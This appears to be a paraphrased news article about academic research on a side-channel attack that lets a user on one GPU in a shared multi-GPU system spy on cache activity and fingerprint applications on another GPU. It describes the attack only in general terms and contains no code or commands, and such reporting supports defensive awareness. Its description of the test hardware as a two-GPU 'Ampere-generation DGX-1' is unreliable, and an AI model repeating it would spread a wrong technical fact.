A team led by Pacific Northwest National Laboratory (PNNL) academic researchers has published a research paper explaining a side-channel assault targeting architectures that depend on several graphics processing units (GPUs) for resource-intensive computational operations.
Multi-GPU systems are employed in high-performance computing and cloud data centers and are shared between multiple users, meaning that the protection of applications and data flowing through them is critical.
“These systems are emerging and increasingly important computational platforms, critical to continuing to scale the performance of important applications such as deep learning. They are already offered as cloud instances offering opportunities for an attacker to spy on a co-located victim,” the researchers stated in their paper.
Researchers from Pacific Northwest National Laboratory, Binghamton University, University of California, and an independent contributor, used the Nvidia Ampere-generation DGX -1 system containing two GPUs attached using a combination of custom interconnect (NVLink) and PCIe connections for their demonstrations.
The researchers reverse-engineered the cache hierarchy, demonstrating how an assault on a single GPU can hit the L2 cache of a connected GPU and cause a contention issue on a linked GPU. They also showed that the malicious actor could “recover the cache hit and miss behavior of another workload,” essentially allowing for the fingerprinting of an application operating on the remote GPU.
In reverse engineering the caches and poking around the shared Non-Uniform Memory Access (NUMA) configuration the team unearthed "the L2 cache on each GPU caches the data for any memory pages mapped to that GPU's physical memory (even from a remote GPU)."
Additionally, the researchers demonstrated proof-of-concept side-channel assaults where they recovered the memorygram of the accesses of a remote victim and used it to fingerprint applications on the victim GPU and to spot the multiple neurons in a concealed layer of a machine learning model.
To precisely spot applications based on their memorygram, the academics designed a deep learning network to accurately identify applications based on their memorygram and say that this can be used as a base for future attacks that not only identify a target application but also infer information about it.
“This attack can be used to identify and reverse engineer the scheduling of applications on a multi-GPU system (simply by spying on all other GPUs in a GPU-box), identify target GPUs that are running a specific victim application, and even identify the kernels running on each GPU,” the researchers added.
While GPUs do have some defenses to thwart side-channel attacks on a single GPU, they are not designed to mitigate this new type of assaults, which are conducted from the user-level and do not require system-level features necessary in other assaults.